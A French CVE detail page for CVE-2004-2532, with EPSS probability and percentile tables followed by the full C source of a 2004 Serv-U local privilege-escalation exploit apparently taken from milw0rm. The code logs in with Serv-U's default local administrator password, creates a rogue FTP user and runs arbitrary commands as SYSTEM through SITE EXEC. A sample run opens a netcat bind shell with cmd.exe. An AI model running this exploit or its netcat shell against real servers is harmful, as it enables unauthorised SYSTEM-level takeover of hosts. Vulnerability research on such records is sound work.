CVE-2004-2532 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	3.77%	–	–
2022-03-27	–	–	3.77%	–	–
2022-04-03	–	–	3.77%	–	–
2022-09-25	–	–	3.77%	–	–
2023-03-12	–	–	–	0.18%	–
2023-03-26	–	–	–	0.18%	–
2023-08-20	–	–	–	0.18%	–
2024-02-11	–	–	–	0.18%	–
2024-04-14	–	–	–	0.18%	–
2024-06-02	–	–	–	0.18%	–
2024-06-02	–	–	–	0.18%	–
2024-07-14	–	–	–	0.18%	–
2024-08-04	–	–	–	0.18%	–
2024-08-11	–	–	–	0.18%	–
2024-12-15	–	–	–	0.18%	–
2024-12-22	–	–	–	0.35%	–
2025-01-19	–	–	–	0.35%	–
2025-03-18	–	–	–	–	7.93%
2025-03-30	–	–	–	–	7.22%
2025-03-30	–	–	–	–	7.22,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	67%
2022-03-27	68%
2022-04-03	84%
2022-09-25	85%
2023-03-12	53%
2023-03-26	54%
2023-08-20	55%
2024-02-11	54%
2024-04-14	55%
2024-06-02	55%
2024-06-02	55%
2024-07-14	56%
2024-08-04	55%
2024-08-11	56%
2024-12-15	57%
2024-12-22	72%
2025-01-19	72%
2025-03-18	91%
2025-03-30	91%
2025-03-30	91%

/* * Hax0rcitos proudly presents * Serv-u Local Exploit >v3.x. (tested also against last version 5.1.0.0) * * All Serv-u Versions have default Login/password for local Administration. * This account is only available to connect in the loopback interface, so a * local user will be able to connect to Serv-u with this account and create * an ftp user with execute rights. after the user is created, just connect * to the ftp server and execute a raw "SITE EXEC" command. the program will * be execute with SYSTEM privileges. * * Copyright (c) 2003-2004 Haxorcitos com . All Rights Reserved. * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. * * * Date: 10/2003 * Author: Andrés Tarascó Acunha * * Greetings to: #haxorcitos - #localhost and #!dsr blackxors =) * * Tested Against Serv-u 4.x and v5.1.0.0 G:\exploit\serv-U\local>whoami INSANE\aT4r G:\exploit\serv-U\local>servulocal.exe "nc -l -p 99 -e cmd.exe" Serv-u >3.x Local Exploit by Haxorcitos <220 Serv-U FTP Server v5.0 for WinSock ready... >USER LocalAdministrator <331 User name okay, need password. ****************************************************** >PASS #l@$ak#.lk;0@P <230 User logged in, proceed. ****************************************************** >SITE MAINTENANCE ****************************************************** [+] Creating New Domain... <200-DomainID=3 220 Domain settings saved ****************************************************** [+] Domain Haxorcitos:3 Created [+] Setting New Domain Online <220 Server command OK ****************************************************** [+] Creating Evil User <200-User=haxorcitos 200 User settings saved ****************************************************** [+] Now Exploiting... >USER haxorcitos <331 User name okay, need password. ****************************************************** >PASS whitex0r <230 User logged in, proceed. ****************************************************** [+] Now Executing: nc -l -p 99 -e cmd.exe <220 Domain deleted ****************************************************** G:\exploit\serv-U\local>nc localhost 99 Microsoft Windows XP [Versión 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\>whoami whoami NT AUTHORITY\SYSTEM C:\> */ #include <stdio.h> #include <stdlib.h> #include <winsock2.h> #include <io.h> #include <process.h> //Responses #define BANNER "220 " #define USEROK "331 User name okay" #define PASSOK "230 User logged in, proceed." #define ADMOK "230-Switching to SYSTEM MAINTENANCE mode." #define DOMAINID "200-DomainID=" //Commands #define XPLUSER "USER haxorcitos\r\n" #define XPLPASSWORD "PASS whitex0r\r\n" #define USER "USER LocalAdministrator\r\n" #define PASSWORD "PASS #l@$ak#.lk;0@P\r\n" #define MAINTENANCE "SITE MAINTENANCE\r\n" #define EXIT "QUIT\r\n" char newdomain[]="-SETDOMAIN\r\n" "-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n" "-TZOEnable=0\r\n" " TZOKey=\r\n"; /* "-DynDNSEnable=0\r\n" " DynIPName=\r\n"; */ char deldomain[]="-DELETEDOMAIN\r\n" "-IP=0.0.0.0\r\n" " PortNo=2121\r\n"; char newuser[] = "-SETUSERSETUP\r\n" "-IP=0.0.0.0\r\n" "-PortNo=2121\r\n" "-User=haxorcitos\r\n" "-Password=whitex0r\r\n" "-HomeDir=c:\\\r\n" "-LoginMesFile=\r\n" "-Disable=0\r\n" "-RelPaths=1\r\n" "-NeedSecure=0\r\n" "-HideHidden=0\r\n" "-AlwaysAllowLogin=0\r\n" "-ChangePassword=0\r\n" "-QuotaEnable=0\r\n" "-MaxUsersLoginPerIP=-1\r\n" "-SpeedLimitUp=0\r\n" "-SpeedLimitDown=0\r\n" "-MaxNrUsers=-1\r\n" "-IdleTimeOut=600\r\n" "-SessionTimeOut=-1\r\n" "-Expire=0\r\n" "-RatioUp=1\r\n" "-RatioDown=1\r\n" "-RatiosCredit=0\r\n" "-QuotaCurrent=0\r\n" "-QuotaMaximum=0\r\n" "-Maintenance=None\r\n" "-PasswordType=Regular\r\n" "-Ratios=None\r\n" " Access=c:\\|RELP\r\n"; #define localport 43958 #define localip "127.0.0.1" char cadena[1024]; int rec,domain; /******************************************************************************/ void ParseCommands(int sock, char *data, int ShowSend, int showResponses, char *response) { send(sock,data,strlen(data),0); if (ShowSend) printf(">%s",data); Sleep(100); do { rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='\0'; if (rec<=0) return; if (showResponses) printf("<%s",cadena); if (strncmp(cadena, DOMAINID,strlen(DOMAINID))==0) domain=atoi(cadena+strlen(DOMAINID)); //} while (strncmp(cadena,response,strlen(response))!=0); } while (strstr(cadena,response)==NULL); printf("******************************************************\r\n"); } /******************************************************************************/ int main(int argc, char* argv[]) { WSADATA ws; int sock,sock2; struct sockaddr_in haxorcitos; struct sockaddr_in xpl; printf("Serv-u >3.x Local Exploit by Haxorcitos\r\n\r\n"); if (argc<2) { printf("USAGE: ServuLocal.exe \"command\"\r\n"); printf("Example: ServuLocal.exe \"nc.exe -l -p 99 -e cmd.exe\""); return(0); } if (WSAStartup( MAKEWORD(2,2), &ws )!=0) { printf(" [-] WSAStartup() error\n"); exit(0); } haxorcitos.sin_family = AF_INET; haxorcitos.sin_port = htons(localport); haxorcitos.sin_addr.s_addr = inet_addr(localip); sock=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); connect(sock,( struct sockaddr *)&haxorcitos,sizeof(haxorcitos)); rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='\0'; printf("<%s",cadena); ParseCommands(sock,USER,1,1,USEROK); ParseCommands(sock,PASSWORD,1,1,PASSOK); ParseCommands(sock,MAINTENANCE,1,0,"230 "); printf("[+] Creating New Domain...\r\n"); ParseCommands(sock,newdomain,0,1,BANNER); printf("[+] Domain Haxorcitos:%i Created\n",domain); /* Only for v5.x printf("[+] Setting New Domain Online\r\n"); sprintf(cadena,"-SERVERCOMMAND\r\n-ID=%i\r\n Command=DomainOnline\r\n",domain); ParseCommands(sock,cadena,0,1,BANNER); */ printf("[+] Creating Evil User\r\n"); ParseCommands(sock,newuser,0,1,"200 "); Sleep(1000); printf("[+] Now Exploiting...\r\n"); xpl.sin_family = AF_INET; xpl.sin_port = htons(2121); xpl.sin_addr.s_addr = inet_addr(localip); sock2=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); connect(sock2,( struct sockaddr *)&xpl,sizeof(xpl)); rec=recv(sock2,cadena,sizeof(cadena),0); cadena[rec]='\0'; ParseCommands(sock2,XPLUSER,1,1,USEROK); ParseCommands(sock2,XPLPASSWORD,1,1,PASSOK); printf("[+] Now Executing: %s\r\n",argv[1]); sprintf(cadena,"site exec %s\r\n",argv[1]); send(sock2,cadena,strlen(cadena),0); shutdown(sock2,SD_BOTH); Sleep(100); ParseCommands(sock,deldomain,0,1,BANNER); send(sock,EXIT,strlen(EXIT),0); shutdown(sock,SD_BOTH); closesocket(sock); closesocket(sock2); return 0; } // milw0rm.com [2004-08-08]